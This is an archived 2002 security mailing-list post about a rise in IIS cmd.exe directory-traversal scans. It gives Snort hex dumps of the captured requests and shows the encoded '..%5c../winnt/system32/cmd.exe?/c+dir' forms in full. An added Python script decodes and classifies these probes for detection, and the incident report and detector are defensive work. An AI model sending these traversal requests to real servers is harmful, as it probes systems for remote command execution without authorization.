Has anyone noticed an increase in scans trying old IIS redirect exploits? It doesn't appear to be RedCode or Nimda IMHO, just various attempts to redirect and run cmd.exe?dir. In the last month we have noticed a large increase in this activity, 94% of which originates from the 66.0.0.0/8 block (448 sources, and only 31 not from 66/8). There are 4 sources originating from fuse.net that are particularly heavy hitters: 33,000 hits out of a total of 47,000 hits. I am only seeing it on our 66.0.0.0/8 network so far. Looks like a new worm possibly, or 448 kiddie clones? The sources all seem to use the same set of cmd.exe attempts as in the obfuscated logs below.

#(5 - 53409) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
      hlen=5 TOS=0 dlen=136 ID=45497 flags=0 offset=0 TTL=112 chksum=11558
TCP:  port=1815 -> dport: 80  flags=***AP*** seq=2441649372
      ack=441678925 off=5 res=0 win=16560 urp=0 chksum=12602
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..

------------------------------------------------------------------------------

#(5 - 53408) [2002-07-17 10:40:25]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
      hlen=5 TOS=0 dlen=140 ID=45378 flags=0 offset=0 TTL=112 chksum=11673
TCP:  port=1626 -> dport: 80  flags=***AP*** seq=2431763146
      ack=975791510 off=5 res=0 win=16560 urp=0 chksum=42327
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 63 2B 64 69 72 20 48 54 54 50 2F 31 2E   ir c+dir HTTP/1.
040 : 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F   0..Host: www..Co
050 : 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F         nnnection: clo

------------------------------------------------------------------------------

#(5 - 53407) [2002-07-17 10:40:21]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
      hlen=5 TOS=0 dlen=136 ID=44586 flags=0 offset=0 TTL=112 chksum=12469
TCP:  port=1429 -> dport: 80  flags=***AP*** seq=2421845072
      ack=4293161072 off=5 res=0 win=16560 urp=0 chksum=38086
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..

------------------------------------------------------------------------------

#(5 - 53406) [2002-07-17 10:40:19]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
      hlen=5 TOS=0 dlen=120 ID=44322 flags=0 offset=0 TTL=112 chksum=12749
TCP:  port=3898 -> dport: 80  flags=***AP**F seq=2161495310
      ack=1433176482 off=5 res=0 win=16560 urp=0 chksum=62138
Payload:  length = 80

000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....

------------------------------------------------------------------------------

#(5 - 53405) [2002-07-17 10:40:17]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
      hlen=5 TOS=0 dlen=138 ID=43768 flags=0 offset=0 TTL=112 chksum=13285
TCP:  port=1395 -> dport: 80  flags=***AP*** seq=2420235203
      ack=934140878 off=5 res=0 win=16560 urp=0 chksum=19568
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D   ir dir HTTP/1.0.
040 : 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E   .Host: www..Conn
050 : 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65         nection: close

------------------------------------------------------------------------------

#(5 - 53404) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
      hlen=5 TOS=0 dlen=137 ID=43638 flags=0 offset=0 TTL=112 chksum=13416
TCP:  port=1366 -> dport: 80  flags=***AP*** seq=2418722397
      ack=4180274008 off=5 res=0 win=16560 urp=0 chksum=17941
Payload:  length = 93

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close

------------------------------------------------------------------------------

#(5 - 53403) [2002-07-17 10:40:16]  WEB-IIS cmd.exe access
IPv4: 66.y.y.35 -> 66.x.x.43
      hlen=5 TOS=0 dlen=137 ID=43512 flags=0 offset=0 TTL=112 chksum=13542
TCP:  port=1162 -> dport: 80  flags=***AP*** seq=2408265220
      ack=4037057826 off=5 res=0 win=16560 urp=0 chksum=11122
Payload:  length = 93

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close

Rich

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
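Added example, not part of the original post: a small Python script that rebuilds each request from ACID-style hex-dump rows like the ones posted, applies an approximation of the IIS decoding that these probes abuse (percent-decoding up to twice, so %255c is caught as well as %5c, with backslashes folded to slashes), and reports which requests reach cmd.exe, whether they needed a `..` traversal to get there, and how the hits break down per source and per /8. The sample input is constructed: three of the payloads from the post, plus one benign request; the sources 66.z.z.12 and 24.a.a.7 are made up, and the parser assumes the ASCII column of a row never starts with a token that looks like a hex pair.

```python
"""Classify IIS cmd.exe probes from ACID/Snort payload hex dumps."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample: (obfuscated source address, ACID hex-dump rows).
# The first three dumps are copied from the post; the last one is a
# hand-built benign request used as a control.
SAMPLE_ALERTS = [
    ("66.y.y.35", """\
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   2f../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
"""),
    ("66.y.y.35", """\
000 : 47 45 54 20 2F 64 2F 77 69 6E 6E 74 2F 73 79 73   GET /d/winnt/sys
010 : 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63   tem32/cmd.exe?/c
020 : 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   +dir HTTP/1.0..H
030 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
040 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A   ction: close....
"""),
    ("66.z.z.12", """\
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D   c../winnt/system
020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69   32/cmd.exe?/c+di
030 : 72 20 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A   r dir HTTP/1.0..
040 : 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E   Host: www..Connn
050 : 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65            ection: close
"""),
    ("24.a.a.7", """\
000 : 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 30 0D 0A   GET / HTTP/1.0..
010 : 48 6F 73 74 3A 20 77 77 77 0D 0A                  Host: www..
"""),
]

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")
REQUEST_LINE = re.compile(r"(\S+) (.*?) (HTTP/\d\.\d)$")


def parse_acid_dump(dump: str) -> bytes:
    """Rebuild payload bytes from rows of the form 'OFF : HH HH ...   ascii'.
    Reads at most 16 byte tokens per row and stops at the first token that
    is not a hex pair (assumed to be the start of the ASCII column)."""
    out = bytearray()
    for line in dump.splitlines():
        off, sep, rest = line.partition(":")
        if not sep or not re.fullmatch(r"\s*[0-9A-Fa-f]{3}\s*", off):
            continue
        row = []
        for tok in rest.split():
            if len(row) == 16 or not HEX_BYTE.match(tok):
                break
            row.append(int(tok, 16))
        out.extend(row)
    return bytes(out)


def normalize_path(target: str) -> str:
    """Approximate IIS canonicalisation of the path part of a request target:
    percent-decode up to twice (catches double encoding such as %255c) and
    fold backslashes to forward slashes."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def classify(src: str, payload: bytes) -> dict:
    """Decode the request line and say whether it is a cmd.exe probe."""
    line = payload.split(b"\r\n", 1)[0].decode("latin-1")
    m = REQUEST_LINE.match(line)
    if m:
        method, target = m.group(1), m.group(2)
    else:  # no HTTP version token: treat the rest of the line as the target
        method, _, target = line.partition(" ")
    path = normalize_path(target)
    traversal = any(".." in seg for seg in path.split("/"))
    cmd_exe = path.lower().endswith("/cmd.exe")
    # The query string after '?' is what cmd.exe would run ('+' is a space).
    command = unquote(target.partition("?")[2].replace("+", " ")) if cmd_exe else ""
    verdict = "cmd.exe probe" if cmd_exe else ("traversal" if traversal else "benign")
    return {"src": src, "method": method, "raw_target": target, "path": path,
            "traversal": traversal, "cmd_exe": cmd_exe, "command": command,
            "verdict": verdict}


def summarize(alerts):
    """Classify every alert and tally cmd.exe probes per source and per /8."""
    results = [classify(src, parse_acid_dump(dump)) for src, dump in alerts]
    probes = [r for r in results if r["cmd_exe"]]
    by_src = Counter(r["src"] for r in probes)
    by_slash8 = Counter(r["src"].split(".")[0] + ".0.0.0/8" for r in probes)
    return results, by_src, by_slash8


if __name__ == "__main__":
    results, by_src, by_slash8 = summarize(SAMPLE_ALERTS)
    for r in results:
        print(f"{r['src']:>10}  {r['verdict']:<14} {r['path']}  {r['command']!r}")
    print("per source:", dict(by_src))
    print("per /8:    ", dict(by_slash8))
```

The `/d/winnt/system32/cmd.exe` request is reported as a cmd.exe probe with no traversal, which is the point of that variant: it relies on a virtual directory that maps straight to a drive root rather than on breaking out of /scripts. The `..%c../` form survives decoding unchanged, and is still flagged because the segment contains `..`; a detector that only looks for `%5c`, `%2f` or `%c0%af` would miss it.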
This archive was generated by hypermail 2b30 : Wed Aug 14 2002 - 12:47:13 PDT